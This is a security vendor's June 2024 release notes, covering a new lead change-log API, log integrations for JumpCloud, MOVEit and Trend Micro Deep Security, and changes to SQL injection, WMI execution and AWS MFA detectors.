June 2024

  • Updated on Jun 13, 2024
  • Published on Jun 13, 2024
Prev Next

Note

This article was originally published on June 3, 2024.

Product updates

Lead Change Log API

You can now keep track of actions performed on your leads by using the new Lead Change Log API endpoint. This API includes detailed information such as assignee changes, status updates, and classification adjustments.

The Lead Change Log API’s key features:

  • Audit Tracking: Allows you to track changes for better programmatic audit purposes.

  • SOC Metrics Calculation: Facilitates the calculation of SOC metrics such as MTTR (Mean Time to Resolution) and MTTA (Mean Time to Acknowledge).

  • BI Tool Integration: Designed to integrate with BI tools to generate detailed SOC reports.

Use this new endpoint to pull lead change logs with increased granularity, thanks to an elaborate list of parameters allowing you to request data for specific events. You can request change logs of leads based on the lead risk level, lead status, lead source (the data type relating to the lead), lead assignee, and more.

We are confident that this new capability will greatly enhance your ability to manage and report on your security operations center activities.

Learn more here

Integrations

JumpCloud Users

JumpCloud User Logs offer visibility into users within an organization's IT environment, capturing a snapshot of all of the users that exist in the JumpCloud system, along with their respective properties such as username, status, etc.

The new integration includes:

  • Ingestion of the data to the data lake

Learn more here

MOVEit

MOVEit Transfer is a secure managed file transfer (MFT) software developed by Ipswitch, a subsidiary of Progress Software Corporation. It is designed to provide organizations with a reliable, efficient, and secure way to transfer files, manage workflows, and ensure compliance with data security policies.

MOVEit Transfer logs provide detailed information on file transfer activities, user actions, and system events, capturing data such as source and destination, file size, transfer status, login and logout activities, IP addresses, and authentication methods.

The new integration includes:

  • Ingestion of the data to the data lake

  • Mapping the data to IOC Search

Learn more here

Trend Micro Deep Security

Trend Micro Deep Security is a comprehensive security solution designed to protect physical, virtual, cloud, and container environments. Trend Micro Deep Security logs provide detailed records of security-related events across protected environments, including physical, virtual, cloud, and container infrastructures.

The new integration includes:

  • Ingestion of the data to the data lake

  • Mapping the data to IOC Search

Learn more here

Detection

Modified detectors

Improvements to the Web application SQL injection attempt detector

TL;DR

The Web application SQL injection attempt detector logic was improved.

We have recently identified the Web application SQL injection attempt detector (web_server_sql_injection) as a low-fidelity detector.

As a result, we have decided to refactor this detector to no longer have group by logic, and instead alert on each attempt individually. This change also allows custom scoring on all relevant fields such as request URI or user agent. we have also revised the conditions on which this detector fires on, in order to reduce false positives and more accurately detect clear-cut SQL injection attempts.

Removed lead attributes:

uri_queries_countreferrers_count, total_duration_sec, stem_target_paths_count, uri_stem_count, user_agents_count, successful_requests_count, grid_array, query_target_paths_count, requests_count.

Added lead attributes:

Server_port, server_username, response_win32_status, response_substatus, response_status, uri_stem_target_path, uri_query_target_path, action, http_method, referrer, request_uri, uri_query, uri_stem, client_request_host, client_ssl_protocol, server_ssl_protocol, user_agent, client_source_port

Improvements to the Process execution through WMI detector

TL;DR

The Process execution through WMI detector logic was expanded to cover the executions of xsl scripts.

In an effort to expand our coverage in detecting the executing of xsl scripts, we decided to improve the Process execution through WMI detector (`edr_wmic_process_call_create_detector`). The detector will now also detect process execution using WMI /format flag used to execute xsl scripts.

As part of this improvement, we’ve excluded as many legitimate use cases as possible without risking missing suspicious events (i.e. without risking false negatives). We also adjusted the score to align better with our scoring system and lowered the default lead confidence level to Medium instead of High.

Deprecated detectors

🔎 Incomplete MFA challenge to AWS console

Detector ID: aws_web_console_mfa_challenge_without_login

As part of our ongoing initiative to improve detection quality, we have identified the "Incomplete MFA challenge to AWS console" detector as a low-fidelity detector.

Following the detector review, we have decided to deprecate it. This decision comes after careful consideration due to the detector’s low fidelity as an indicator of malicious attempts and because our analysis indicated that it does not reliably capture genuine security threats.